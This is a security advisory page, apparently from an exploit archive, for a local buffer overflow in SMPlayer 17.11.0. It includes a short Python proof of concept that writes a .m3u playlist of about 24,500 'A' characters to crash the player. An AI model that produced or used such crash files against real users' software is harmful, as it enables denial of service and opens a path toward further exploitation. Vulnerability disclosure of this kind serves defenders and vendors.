SMPlayer 17.11.0 .m3u Buffer Overflow

2017.11.06
Credit: bzyo
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: SMPlayer 17.11.0 - '.m3u' Crash (PoC) # Date: 05-11-2017 # Vulnerable Software: SMPlayer v17.11.0 # Vendor Homepage: http://www.smplayer.info # Version: v17.11.0 # Software Link: http://www.smplayer.info/en/downloads # Tested On: Windows 7 x64 # # # PoC: generate crash.m3u, open playlist twice in app # # file="crash.m3u" crash = "A"*24538 #crashes on 24538, but more will do writeFile = open (file, "w") writeFile.write( crash ) writeFile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top